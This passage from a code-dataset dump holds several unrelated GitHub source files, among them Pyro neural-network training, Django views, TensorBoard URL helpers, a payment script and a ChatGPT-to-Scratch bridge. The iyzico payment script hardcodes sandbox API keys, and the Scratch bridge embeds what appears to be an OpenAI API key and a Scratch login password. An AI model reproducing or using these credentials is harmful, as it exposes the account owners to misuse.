distribution of variational parameters\n guide = AutoDiagonalNormal(model)\n\n # Create SVI object\n # Use trace elbo as loss - \"Evidence lower bound\"\n # Maximizing elbo minimizes KL divergence\n svi = pyro.infer.SVI(\n model,\n guide,\n optim=pyro.optim.ClippedAdam({'lr':1e-2}),\n loss=pyro.infer.Trace_ELBO()\n )\n\n # Plot prior distributions\n print(\"Plotting prior samples\")\n plot_param_samples(model, 5000)\n plt.savefig(f\"{cfg['plotDirectory']}/train/prior_predictive.png\")\n\n \n epoch_loss = np.zeros(EPOCHS)\n test_loss = np.zeros(EPOCHS)\n for k in range(len(epoch_loss)):\n if k%5 ==0: print(f\"epoch {k}\")\n loss = 0\n \n # Do training step\n for x, y in train_loader:\n # SVI.step -> take a single gradient step, return loss estimate\n loss += svi.step(x, y)\n epoch_loss[k] = loss\n \n # Do testing evaluation\n loss = 0\n for x, y in test_loader:\n # SVI.evaluate_loss -> get loss estimate without gradient step\n loss += svi.evaluate_loss(x, y)\n test_loss[k] = loss\n\n plot_loss(train_loss=epoch_loss/len(train_loader.dataset), test_loss=test_loss/len(test_loader.dataset))\n plt.savefig(f\"{cfg['plotDirectory']}/train/bnn_loss.png\")\n\n # Create Predictive model\n predictive = Predictive(\n model, guide=guide, num_samples=cfg[\"samples\"])\n print(f\"Final Loss {epoch_loss[-1]}\")\n\n # Plot posterior distributions\n allweights, allbiases = plot_param_samples(guide, 10000)\n hf = h5py.File(f\"{cfg['plotDirectory']}/train/posterior_predictive.h5\", 'w')\n hf.create_dataset('train_loss', data = epoch_loss/len(train_loader.dataset))\n hf.create_dataset('test_loss', data = test_loss/len(test_loader.dataset))\n hf.create_dataset('bias_layer0',data = allbiases[0])\n hf.create_dataset('bias_layer1',data = allbiases[1])\n hf.close()\n plt.savefig(f\"{cfg['plotDirectory']}/train/posterior_predictive.png\")\n\n\n # Save the bcnn\n torch.save({\n cfg[\"model_name\"]: predictive,\n cfg[\"state_dict\"]: predictive.state_dict(),\n #\"bcnn_guide\": guide, # TODO: Drop if not useful in the future\n #\"bcnn_svi\" : svi,\n #\"bcnn_model\": model\n }, cfg[\"model_file\"])\n\n\n # We'll get majority logic accuracy\n correct_arr = []\n y_hat = np.zeros(shape=(len(test_loader.dataset)))\n y_true = np.zeros(shape=(len(test_loader.dataset)))\n print(\"Starting to evaluate majority logic accuracy (abort if this isn't useful to you.)\")\n for i, (x, y) in enumerate(test_loader):\n print(f\"Progress - {round(100*i/len(test_loader))}% done\")\n preds = predictive(x)\n max_indices = torch.sort(torch.exp(preds[\"probs\"]), dim=2, descending=True).indices[:,:,0] \n\n block_start = i * test_loader.batch_size\n block_end = block_start + len(y)\n y_hat[block_start:block_end] = stats.mode(max_indices, 0).mode[0,:]\n y_true[block_start:block_end] = y\n\n acc = sum(np.array(y_hat) == np.array(y_true)) / len(y_true)\n print(f\"Majority logic accuracy = {acc}\") \n\n\n","repo_name":"bdongmd/DUQ","sub_path":"bnn.py","file_name":"bnn.py","file_ext":"py","file_size_in_byte":9374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"29969391243","text":"from django.views.generic import ListView, DetailView\nfrom .models import Post\n\nclass PostsList(ListView):\n model = Post\n ordering = '-dateCreation'\n template_name = 'news/posts.html'\n context_object_name = 'posts'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['all_news'] = Post.objects.all()\n return context\n\n\nclass PostDetail(DetailView):\n model = Post\n template_name = 'news/post.html'\n context_object_name = 'post'\n","repo_name":"lmi-1/project_d3","sub_path":"NewsPaper/news/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"26552736230","text":"from typing import Sequence, Dict\nfrom google.cloud.aiplatform_v1beta1.services.tensorboard_service.client import (\n TensorboardServiceClient,\n)\n\n_SERVING_DOMAIN = \"tensorboard.googleusercontent.com\"\n\n\ndef _parse_experiment_name(experiment_name: str) -> Dict[str, str]:\n \"\"\"Parses an experiment_name into its component segments.\n\n Args:\n experiment_name: Resource name of the TensorboardExperiment. E.g.\n \"projects/123/locations/asia-east1/tensorboards/456/experiments/exp1\"\n\n Returns:\n Components of the experiment name.\n\n Raises:\n ValueError: If the experiment_name is invalid.\n \"\"\"\n matched = TensorboardServiceClient.parse_tensorboard_experiment_path(\n experiment_name\n )\n if not matched:\n raise ValueError(f\"Invalid experiment name: {experiment_name}.\")\n return matched\n\n\ndef get_experiment_url(experiment_name: str) -> str:\n \"\"\"Get URL for comparing experiments.\n\n Args:\n experiment_name: Resource name of the TensorboardExperiment. E.g.\n \"projects/123/locations/asia-east1/tensorboards/456/experiments/exp1\"\n\n Returns:\n URL for the tensorboard web app.\n \"\"\"\n location = _parse_experiment_name(experiment_name)[\"location\"]\n name_for_url = experiment_name.replace(\"/\", \"+\")\n return f\"https://{location}.{_SERVING_DOMAIN}/experiment/{name_for_url}\"\n\n\ndef get_experiments_compare_url(experiment_names: Sequence[str]) -> str:\n \"\"\"Get URL for comparing experiments.\n\n Args:\n experiment_names: Resource names of the TensorboardExperiments that needs to\n be compared.\n\n Returns:\n URL for the tensorboard web app.\n \"\"\"\n if len(experiment_names) < 2:\n raise ValueError(\"At least two experiment_names are required.\")\n\n locations = {\n _parse_experiment_name(experiment_name)[\"location\"]\n for experiment_name in experiment_names\n }\n if len(locations) != 1:\n raise ValueError(\n f\"Got experiments from different locations: {', '.join(locations)}.\"\n )\n location = locations.pop()\n\n experiment_url_segments = []\n for idx, experiment_name in enumerate(experiment_names):\n name_segments = _parse_experiment_name(experiment_name)\n experiment_url_segments.append(\n \"{cnt}-{experiment}:{project}+{location}+{tensorboard}+{experiment}\".format(\n cnt=idx + 1, **name_segments\n )\n )\n encoded_names = \",\".join(experiment_url_segments)\n return f\"https://{location}.{_SERVING_DOMAIN}/compare/{encoded_names}\"\n","repo_name":"googleapis/python-aiplatform","sub_path":"google/cloud/aiplatform/utils/tensorboard_utils.py","file_name":"tensorboard_utils.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","stars":433,"dataset":"github-code","pt":"68"} +{"seq_id":"33596557651","text":"# import sqlite3\nimport iyzipay\nimport json\n\nfrom .data import veri\n# db = sqlite3.connect(\"db.sqlite3\")\n\n# vt = db.cursor()\n\n# oku = vt.execute(\"SELECT * from iyzico_payment\")\n# veri = oku.fetchall()[-1]\n\n# vt.close()\n\noptions = {\n 'api_key': \"sandbox-xMmsty6A68us9iGfhLxIm7UVQ4WRSlQy\",\n 'secret_key': \"sandbox-QQnp3eC4j2kYe5nCS0nogK4H0gCau9HH\",\n 'base_url': iyzipay.base_url\n}\n\n\n\npayment_card = veri\n\nbuyer = veri\n\naddress = veri\n\nbasket_items = veri\n\nrequest = veri\n\n\ndef ode():\n\n payment = iyzipay.Payment().create(request, options)\n\n ode = payment.read().decode('utf-8')\n dic = json.loads(ode)\n print(dic)\n\n return dic[\"status\"]\n\n\n\n \n\n\n","repo_name":"oftopaloglu/TiklaAl","sub_path":"iyzico/create_payment.py","file_name":"create_payment.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"12763268924","text":"# Clean XML page and return only clean text.\ndef cleanPage(xmlpage):\n\n import xml.etree.ElementTree as ET\n\n tree = ET.fromstring(xmlpage)\n\n for node in tree.iter():\n if node.tag == 'text':\n text = node.text\n if text is None:\n return '#redirect'\n else:\n text = text.replace('\\n', ' ').replace('\\r', '')\n text = text.lower()\n\n return text\n\n\n\n\n","repo_name":"duarteocarmo/BigData_WikipediaInspector","sub_path":"Project/P1_Clean_Page.py","file_name":"P1_Clean_Page.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24212551898","text":"from trytond.model import ModelSQL, ModelView, fields\nfrom trytond.pool import Pool\n\n\nclass Allocation(ModelSQL, ModelView):\n 'Allocation'\n __name__ = 'project.allocation'\n employee = fields.Many2One(\n 'company.employee', \"Employee\", required=True, ondelete='CASCADE')\n work = fields.Many2One(\n 'project.work', \"Work\", required=True, ondelete='CASCADE')\n percentage = fields.Float('Percentage', digits=(16, 2), required=True,\n domain=[('percentage', '>', 0.0)])\n\n @staticmethod\n def default_percentage():\n return 100\n\n def get_rec_name(self, name):\n return self.employee.rec_name\n\n @classmethod\n def search_rec_name(cls, name, clause):\n return [('employee.rec_name',) + tuple(clause[1:])]\n\n @classmethod\n def write(cls, *args):\n Work = Pool().get('project.work')\n super(Allocation, cls).write(*args)\n\n works = Work.search([\n ('allocations', 'in',\n [a.id for allocations in args[::2] for a in allocations]),\n ])\n\n for work in works:\n work.reset_leveling()\n for work in works:\n work.compute_dates()\n\n @classmethod\n def create(cls, vlist):\n allocations = super(Allocation, cls).create(vlist)\n for allocation in allocations:\n allocation.work.reset_leveling()\n allocation.work.compute_dates()\n return allocations\n\n @classmethod\n def delete(cls, allocations):\n works = [a.work for a in allocations]\n super(Allocation, cls).delete(allocations)\n\n for work in works:\n work.reset_leveling()\n for work in works:\n work.compute_dates()\n","repo_name":"tryton/tryton","sub_path":"modules/project_plan/allocation.py","file_name":"allocation.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"68"} +{"seq_id":"12558597703","text":"import openai\nimport scratchattach as sa\nimport time\n\n# Set up your OpenAI API credentials\nopenai.api_key = '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'\ns = sa.login (\"LightingGun_test\", \"yale1288\")\nconn = s.connect_cloud (\"882220066\")\nword = {'a': '10', 'b': '11', 'c': '12', 'd': '13', 'e': '14', 'f': '15', 'g': '16', 'h': '17', 'i': '18', 'j': '19', 'k': '20', 'l': '21', 'm': '22', 'n': '23', 'o': '24', 'p': '25', 'q': '26', 'r': '27', 's': '28', 't': '29', 'u': '30', 'v': '31', 'w': '32', 'x': '33', 'y': '34', 'z': '35', \" \":\"36\", \"!\":\"37\", \"?\":\"38\", \",\":\"39\", \".\":\"40\", \"'\":\"41\"}\n \ndef encode(value):\n global word\n val = value.lower()\n res = \"\"\n word = {'a': '10', 'b': '11', 'c': '12', 'd': '13', 'e': '14', 'f': '15', 'g': '16', 'h': '17', 'i': '18', 'j': '19', 'k': '20', 'l': '21', 'm': '22', 'n': '23', 'o': '24', 'p': '25', 'q': '26', 'r': '27', 's': '28', 't': '29', 'u': '30', 'v': '31', 'w': '32', 'x': '33', 'y': '34', 'z': '35', \" \":\"36\", \"!\":\"37\", \"?\":\"38\", \",\":\"39\", \".\":\"40\", \"'\":\"41\"} \n for w in val:\n res = res + word[w]\n res = res + \"00\"\n print(res)\n return res\n #Define a function to send a message and receive a response from ChatGPT\ndef chat_with_gpt(conversation):\n response = openai.Completion.create(\n engine='text-davinci-002',\n prompt=conversation,\n max_tokens=1000,\n temperature=0.7,\n n=1,\n stop=None,\n timeout=None\n )\n return response.choices[0].text.strip()\n\ndef decode(value):\n decoded = \"\"\n a = list(value)\n for i in range(0,int(len(a)/2)-1):\n #print(str(a[i]+a[i+1]))\n decoded = decoded + list(word)[list(word.values()).index(str(a[2*i])+ str(a[2*i+1]))]\n return decoded\n# Start a conversation with ChatGPT\ndef start_chat():\n print(\"Welcome to ChatGPT! Type 'exit' to end the conversation.\")\n\n conversation = \"\"\n\n while True:\n while True:\n old = sa.get_var(\"882220066\",\"to_host\")\n time.sleep(1)\n if not old == sa.get_var(\"882220066\",\"to_host\"):\n print(\"not\")\n break\n \n dec = decode(sa.get_var(\"882220066\",\"to_host\"))\n user_input = dec\n\n if user_input.lower() == 'exit':\n break\n\n # Concatenate user input and conversation history\n conversation += \"You: \" + user_input + \"\\n\"\n conversation += \"ChatGPT: \"\n\n # Get response from ChatGPT\n response = chat_with_gpt(conversation)\n\n print(\"ChatGPT:\", response)\n encoded = encode(response)\n conn.set_var(\"from_host\", encoded)\n print(\"sent\")\n\n # Add ChatGPT response to conversation\n conversation += response + \"\\n\"\n\n# Call the start_chat function to begin the conversation\nstart_chat()\n","repo_name":"MomoCoder123/OpenAI-test","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"29987435885","text":"\"\"\"\na class to describe an insertion profile of a single residue into the membrane\n\"\"\"\nfrom MPs.SplineCalibrationVars import *\nimport sys\nimport numpy as np\nfrom scipy import interpolate\nfrom utils.Logger import lgr\n\n\nclass InsertionProfile:\n \"\"\"\n a single residue insertion profile described by either a sorted list of\n PoZEnergy instances (poz_energy) or by polynum\n \"\"\"\n def __init__(self, aa: str, pos_score: dict,\n membrane_half_depth: int=MEMBRANE_HALF_WIDTH,\n residue_num: int=NUM_AAS, adjust_extra_membranal=True,\n poly_edges: list=[]):\n \"\"\"\n\n \"\"\"\n self.AA = aa\n self.membrane_half_depth = membrane_half_depth\n self.residue_num = residue_num\n self.pos_score = pos_score\n self.extramembrane_adjusted = False\n self.poly_edges = poly_edges\n\n def __repr__(self):\n res = '\\n' % self.AA\n res += '\\t\\n'\n # for a in self.poz_energy:\n # res += '\\t\\t<%s/>\\n' % a\n res += '\\t\\n'\n # print('ddd', self.polynom)\n try:\n res += '' % self.polynom\n except:\n pass\n res += '\\n' % self.AA\n return res\n\n def within_edges(self, pnt) -> bool:\n return self.poly_edges[0] <= pnt <= self.poly_edges[1]\n\n def polynom_at_z(self, z: float) -> float:\n \"\"\"\n returns the polynoms value at z\n :type z: float\n \"\"\"\n return np.polyval(self.polynom, z)\n\n def format_polyval(self):\n \"\"\"\n print the polyval values for table\n \"\"\"\n return ' '.join([str(a) for a in self.polynom])\n\n def format_spline_energies(self):\n \"\"\"\n :return: string of all energies separated by spaces\n \"\"\"\n if self.AA not in SKIP_AAS:\n return ' '.join(str(self.pos_score[pos]\n if -SPLINE_LIM <= POS_Z_TOT[pos] <=\n SPLINE_LIM else 0.0) for pos in POS_RANGE)\n else:\n lgr.log(\"creating %s spline as 0.0\" % self.AA)\n return ' '.join(\"0.0\" for pos in POS_RANGE)\n\n def rmsd_ips(self, other) -> float:\n \"\"\"\n retruns the difference between the IPs calculated as by RMSD over Z\n \"\"\"\n res = 0.0\n for pos in range(1, TOTAL_AAS+1):\n if self.poly_edges[0] <= POS_Z_TOT[pos] <= self.poly_edges[1]:\n res += (self.pos_score[pos] - other.pos_score[pos])**2\n return np.sqrt(np.mean(res))\n\n def adjust_exta_membrane(self):\n \"\"\"\n set all positions outside [-20, 20] to 0. use only for setting splines in Rosetta\n :return:\n \"\"\"\n self.extramembrane_adjusted = True\n print('ADJUSTING !!! !STOP ME !!!!')\n sys.exit()\n for pos in POS_RANGE:\n if -15 > POS_Z_TOT[pos] or +15 < POS_Z_TOT[pos]:\n self.pos_score[pos] = 0\n\n\n# def pos_energy_dict_to_PoZEnergy_list(pos_energy_dict: dict) -> list():\n# \"\"\"\n# creates an ordered list of PoZEnergy instances corresponding to their positions\n# \"\"\"\n# result = []\n# for pos in range(1, TOTAL_AAS+1):\n# result.append(PoZEnergy(pos, POS_Z_TOT[pos], pos_energy_dict[pos]))\n# return result\n\n\ndef subtract_IP_from_IP(ip1: InsertionProfile, ip2: InsertionProfile, verbose: bool = False, smooth: bool=True) -> InsertionProfile:\n \"\"\"\n \"\"\"\n new_pos_score = {}\n if not smooth:\n for pos in POS_RANGE:\n new_pos_score[pos] = ip1.pos_score[pos] - ip2.pos_score[pos]\n else:\n # smooth the transition from water to membrane between +/-15A to\n # +/-25A for resulting splines\n y, x = [], []\n for pos in POS_RANGE:\n if -SPLINE_LIM > POS_Z_TOT[pos] or POS_Z_TOT[pos] > SPLINE_LIM:\n y.append(0.0)\n x.append(pos)\n elif ip1.poly_edges[0] <= POS_Z_TOT[pos] <= ip1.poly_edges[1]:\n y.append(ip1.pos_score[pos] - ip2.pos_score[pos])\n x.append(pos)\n tck = interpolate.splrep(x, y, s=SPLINE_SMOOTHNESS)\n new_pos_score = {pos: interpolate.splev(pos, tck)\n if -SPLINE_LIM <= POS_Z_TOT[pos] <= +SPLINE_LIM else 0.0\n for pos in POS_RANGE}\n\n return InsertionProfile(ip1.AA, new_pos_score)\n\n\ndef add_IP_to_IP(ip1: InsertionProfile, ip2: InsertionProfile, verbose: bool = False) -> InsertionProfile:\n \"\"\"\n \"\"\"\n new_pos_score = {}\n for pos in POS_RANGE:\n new_pos_score = ip1.pos_score[pos] = ip2.pos_score[pos]\n if verbose:\n print(pos, ip1.pos_score[pos], ip2.pos_score[pos],\n ip1.pos_score[pos]+ip2.pos_score[pos])\n return InsertionProfile(ip1.AA, new_pos_score)\n\n","repo_name":"Fleishman-Lab/membrane_protein_energy_function","sub_path":"MPs/InsertionProfiles.py","file_name":"InsertionProfiles.py","file_ext":"py","file_size_in_byte":4891,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"22705500971","text":"\"\"\"\nWe make use of queues to do the level order traversal. \nWhat we did is we visit a node and put its left and right child in the queue\nand delete the current node. \nIn this way we visit the tree in level order.\n\"\"\"\n\nclass Node:\n\n def __init__(self,data):\n\n self.left = None\n\n self.right = None\n\n self.data = data\n\ndef level_order(queue):\n\n if len(queue) == 0:\n\n return\n\n node = queue[0]\n\n queue.pop(0)\n\n if node.left:\n\n queue.append(node.left)\n\n if node.right:\n\n queue.append(node.right)\n\n print(node.data)\n\n level_order(queue)\n\nqueue = list()\n\nroot = Node(1)\n\nqueue.append(root)\n\nroot.left = Node(2)\n\nroot.right = Node(3)\n\nroot.left.left = Node(4)\n\nroot.left.right = Node(5)\n\nlevel_order(queue)\n\n# 1 2 3 4 5 ","repo_name":"nezlobnaya/project-algorithms","sub_path":"traversal/level_order_tree_traversal.py","file_name":"level_order_tree_traversal.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"14973136197","text":"import sys\n\nsys.stdin = open(\"_모음이보이지않는사람.txt\")\n\nT = int(input())\n\nfor tc in range(1, T + 1):\n S = input()\n res = ''\n\n for ch in S:\n if ch not in 'aeiou':\n res += ch\n\n print(f'#{tc} {res}')","repo_name":"jupiter6676/TIL","sub_path":"Project/01-PJT-05/1_모음이보이지않는사람.py","file_name":"1_모음이보이지않는사람.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"24078584451","text":"# %% Imports\n\nimport gc\n\nimport numpy\nimport tensorflow\nfrom tensorflow import keras, data\nfrom keras import layers\nimport matplotlib.pyplot as pyplot\nfrom tqdm import tqdm\n\n# Check for GPU\nprint(tensorflow.config.list_physical_devices(\"GPU\"))\n\nBATCH_COUNT = 100\nWIDTH = 256\nHEIGHT = 256\nSIZE = (WIDTH, HEIGHT)\nINPUT_BATCHES_DIR = f\"training_inputs_{WIDTH}_{HEIGHT}_batched/\"\nLABEL_BATCHES_DIR = f\"training_labels_{WIDTH}_{HEIGHT}_batched/\"\nINPUTS_DIR = f\"training_inputs_{WIDTH}_{HEIGHT}/\"\nLABELS_DIR = f\"training_labels_{WIDTH}_{HEIGHT}/\"\n\n# %% Load index\n\nindex = []\nfor idx in range(BATCH_COUNT):\n index.append(\"batch_\" + str(idx))\n \nprint(index)\n\n# %% Load dataset\n\n\n\n# %% Model\n\nclass EncoderBlock(layers.Layer):\n def __init__(self, n_filters, max_pooling=True):\n super().__init__()\n self.max_pooling = max_pooling\n self.conv_1 = layers.Conv2D(n_filters, kernel_size=3, activation='relu', padding='same')\n if max_pooling:\n self.max_pool = layers.MaxPool2D(pool_size=(2, 2), strides=2, padding='same')\n \n def call(self, inputs):\n x = self.conv_1(inputs)\n skip = x\n if self.max_pooling:\n x = self.max_pool(x)\n return x, skip\n\nclass DecoderBlock(layers.Layer):\n def __init__(self, n_filters, width, height):\n super().__init__()\n self.up_sampling = layers.UpSampling2D(size=(2, 2))\n self.crop = layers.CenterCrop(width, height)\n self.concat = layers.Concatenate(axis=3)\n self.conv_1 = layers.Conv2DTranspose(n_filters, kernel_size=3, activation='relu', padding='same')\n \n def call(self, inputs, skip):\n x = self.up_sampling(inputs)\n x = self.crop(x)\n x = self.concat([x, skip])\n x = self.conv_1(x)\n return x\n\nclass Encoder(layers.Layer):\n def __init__(self):\n super().__init__()\n self.block_1 = EncoderBlock(8)\n self.block_2 = EncoderBlock(16)\n self.block_3 = EncoderBlock(32)\n self.block_4 = EncoderBlock(64, max_pooling=False)\n \n def call(self, inputs):\n x, skip_1 = self.block_1(inputs)\n x, skip_2 = self.block_2(x)\n x, skip_3 = self.block_3(x)\n x, _ = self.block_4(x)\n return x, skip_1, skip_2, skip_3\n\nclass Decoder(layers.Layer):\n def __init__(self):\n super().__init__()\n self.block_1 = DecoderBlock(32, WIDTH//4, HEIGHT//4)\n self.block_2 = DecoderBlock(16, WIDTH//2, HEIGHT//2)\n self.block_3 = DecoderBlock(8, WIDTH, HEIGHT)\n self.conv_out = layers.Conv2DTranspose(1, kernel_size=3, activation='sigmoid', padding='same')\n \n def call(self, inputs, skip_1, skip_2, skip_3):\n x = self.block_1(inputs, skip_3)\n x = self.block_2(x, skip_2)\n x = self.block_3(x, skip_1)\n x = self.conv_out(x)\n return x\n\nclass UNet(keras.Model):\n def __init__(self):\n super().__init__()\n self.encoder = Encoder()\n self.decoder = Decoder()\n \n def call(self, inputs, training=False):\n x, skip_1, skip_2, skip_3 = self.encoder(inputs)\n outputs = self.decoder(x, skip_1, skip_2, skip_3)\n return outputs\n\n# %%\n\nmodel = UNet()\nmodel.compile(\n optimizer=keras.optimizers.Adam(learning_rate=1e-3),\n loss=\"binary_crossentropy\",\n metrics=[\"binary_accuracy\"]\n)\n\n# %%\n\nhists = []\nfor epoch in range(10):\n for batch in tqdm(range(BATCH_COUNT)):\n inputs = numpy.load(INPUT_BATCHES_DIR + \"batch_\" + str(batch) + \".npy\")\n labels = numpy.load(LABEL_BATCHES_DIR + \"batch_\" + str(batch) + \".npy\")\n hist = model.fit(inputs, labels, verbose=0)\n hists.append(hist)\n gc.collect()\n","repo_name":"Chorizoman01/ai-skin-lesion-detection-","sub_path":"scripts/model_old.py","file_name":"model_old.py","file_ext":"py","file_size_in_byte":3666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"68"} +{"seq_id":"24212344699","text":"from django.http import HttpResponse\n\nfrom django.template import Template,Context\n\nfrom django.shortcuts import render\n\nfrom django.shortcuts import loader\nclass Persona(object):\n\n def __init__(self,nombre,edad,rol):\n\n self.nombre=nombre\n\n self.edad=edad\n\n self.rol=rol\n\ndef saludo(request):\n\n Mi_persona=Persona(\"Franco Daniel Capra\",23,\"Ayudante\")\n\n Lista_de_temas=[\"Condicionales\",\"Control de flujo\",\"Listas\",\"Tuplas y diccionarios\",\"Funciones\"]\n\n Diccionario_plantilla={\"mi_nombre\":Mi_persona.nombre,\"mi_edad\":Mi_persona.edad,\"mi_rol\":Mi_persona.rol,\"lista_temas\":Lista_de_temas}\n\n documento_externo=loader.get_template(\"Plantilla_base.html\")\n\n documento_cargado=documento_externo.render(Diccionario_plantilla)\n\n return HttpResponse(documento_cargado)\n\ndef Plantilla_Heredada(request):\n\n return render(request,\"CursoC.html\")","repo_name":"fradaca/Proyectos_Django","sub_path":"Curso_Tutorial/Curso_Tutorial/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"69866235736","text":"#56: Cell Phone Bill\r\na=float(input(\"Enter the number of minutes:\"))\r\nb=float(input(\"Enter the number of text messages:\"))\r\nif a<50 and b<50:\r\n baseCharge=round(15,2)\r\nelse:\r\n baseCharge=round((15+(a-50)*0.25+(b-50)*0.15),2)\r\nprint(\"Base charge:$\",baseCharge)\r\nprint(\"911 fee:$ 0.44\")\r\nprint(\"Tax:$\",round(0.05*(baseCharge+0.44),2))\r\nprint(\"Total bill:$\",round((baseCharge + 0.44+0.05*(baseCharge+0.44)),2))\r\n\r\n","repo_name":"L0ganhowlett/Python_workbook-Ben_Stephenson","sub_path":"56 Cell Phone Bill.py","file_name":"56 Cell Phone Bill.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"31767190868","text":"#!/usr/bin/python3\nimport numpy as np\nfrom sprandn import sprandn\nimport matplotlib.pyplot as plt\nimport math\nimport os\nimport sys\nfrom FORCE import FORCE\n\n# This py-file initalizes parameters and then runs the FORCE-learning process\ndat = np.load('data/data_alpha0.57.npy')/250\n\n# command-line argument to set output-dir\nindex = int(sys.argv[1])\n# learning repetitions of the FORCE-learning process\nreps = 40\n# Number of units in FORCE network\nN = 1600\n# Number of units from FORCE-network connected to the read-out units\nnRec2Out = N\n# time-step of learning process\ndt = 0.12\n# seconds in recording data time (two time-steps in CCM-simulation process are 0.0005 seconds apart)\nnsecs = int(0.0005*reps*len(dat))\n# Factor setting the initial activity in the FORCE-network (prior to learning)\n# for further information see the explanation of g in the publication \n# of schwalger et. Al (Generating Coherent Patterns of Activity from Chaotic Neural Networks)\ng = 1.5\n# connection probability of units in FORCE-network c\np = 1\n# This factor is used to scale the initial connection strength to the total number of connections \nscale = 1/math.sqrt(p*N)\n# The number of FORCE-sub networks (#Number of learning functions)\n# One cortical column has 8 populations therefore here it is 8\npop_count = dat.shape[1]\n\nsimtime = np.linspace(0,nsecs,num=(len(dat)*reps))\n\n# popV = population vector. Each population has one popV with entries that are either 1 if unit is assigned to that population\npopV = np.zeros((pop_count,N,1))\n\nfor i in range(pop_count): \n popV[i,(N//pop_count)*i:(N//pop_count)*(i+1)] = np.ones_like(popV[i,(N//pop_count)*i:(N//pop_count)*(i+1)])\n\nIstim = np.zeros(len(simtime))\nft = np.array([np.tile(dat[:,i],reps) for i in range(pop_count)])\n\n# time in seconds of stimulation onset\nstimOnTime = 0.1\n# time in seconds of stimulation off\nstimOffTime = 0.16\n\nfor i in range(len(simtime)):\n if int(stimOnTime/0.0005) < i%len(dat) pd.DataFrame:\n cols = list(df_ts.columns.drop(lbl_cols))\n total_df = pd.DataFrame()\n for period in df_ts['Period'].unique():\n period_df = df_ts.loc[df_ts['Period'] == period].copy(deep=True) # Get period data\n for ft_col in cols:\n roll = period_df.groupby(['Id', 'Period'])[ft_col].rolling(window_len)\n ma = roll.mean().shift(lag).reset_index(0, drop=True)[period]\n period_df[ft_col] = ma\n period_df = period_df.dropna().reset_index(drop=True)\n total_df = pd.concat([total_df, period_df], axis=0)\n return total_df","repo_name":"thecml/fall-risk-assessment","sub_path":"src/tools/preprocessor.py","file_name":"preprocessor.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"13770811108","text":"import sys\nimport numpy as np\nimport os\n\n#oov_symbol_file = sys.argv[1]\nwords_file = sys.argv[1]\nref_ctm = sys.argv[2]\nOOV_cand_folder = sys.argv[3]\n#num_jobs = int(sys.argv[4])+1\n#print(str(num_jobs))\n\nphoneme_indices = []\n\ndef find_all(a_str, sub):\n\tstart = 0\n\twhile True:\n\t\tstart = a_str.find(sub, start)\n\t\tif start == -1: return\n\t\tyield start\n\t\tstart += len(sub)\n\n#for line in open(oov_symbol_file, \"r\"):\n#\toov_symbol = line.split()[0]\n#\tprint(\"OOV SYMBOL: \" + oov_symbol)\n\nfor line in open(words_file, \"r\"):\n\tif line[0:4] == 'PHN_':\n\t\tphoneme_indices.append(line.split()[1])\n\tif line.split()[0] == \"\":\n\t\toov_symbol = line.split()[1]\n\tif line.split()[0] == \"\":\n\t\tphnsilsp_symbol = line.split()[1]\nprint(\"phoneme indices: \") \nprint(phoneme_indices)\nprint(\"OOV and phnsilsp symbols:\")\nprint(oov_symbol + \" \" + phnsilsp_symbol)\n\nref_start = 1\n#ref_oov = []\n\n#for i in range(1, num_jobs):\n#\tprint ref_ctm_path\nref_ctm_file = open(ref_ctm, \"r\")\nfor line in ref_ctm_file:\n\tspl = line.split()\n#\t\tprint(spl[4])\n\tif spl[3] == oov_symbol: #unk found in reference\n\t\tif ref_start == 1:\n\t\t\tref_oov = np.array([spl[0], spl[1], spl[2], 0])\n\t\t\tref_start = 0\n\t\telse:\n\t\t\tref_oov = np.vstack((ref_oov, [spl[0], spl[1], spl[2], 0]))\n#\t\t\tprint(ref_oov)\nprint(\"REF OOVS: \" + str(len(ref_oov)))\n#print(ref_oov)\n\nin_unk = 0\ntotal_score = 0\ntotal_unks = 0\nusek_ready = 0\npred = ''\n#total_phone_string_duration = 0\n\n#for i in range(1, num_jobs):\nfor candidate in os.listdir(OOV_cand_folder):\n\ttotal_unks = total_unks + 1\n#\thyp_ctm_file = open(hyp_ctm_path + \"/ctm.\" + str(i), \"r\")\n\tprint(candidate)\n\tunderscores = list(find_all(candidate,\"_\"))\n#\tfor line in hyp_ctm_file:\n#\t\tprint(line)\n#\t\tspl = line.split()\n#\t\tprint(spl[4])\n#\t\tif spl[4] == oov_symbol:\n#\t\t\tif pred == oov_symbol or pred == phnsilsp_symbol:\n#\t\t\t\tprint(\"USEK READY CALCULATION SCORE\")\n#\t\t\t\tall_ref_unks = ref_oov[ref_oov[:,0] == filename]\n#\t\t\t\tprint(all_ref_unks)\n#\t\t\t\tbiggest_intersection = 0\n#\t\t\tusek_ready = 0\n#\t\t\tprint(line)\n\tfilename = candidate[underscores[0]+1:underscores[1]]\n\ttime_start = 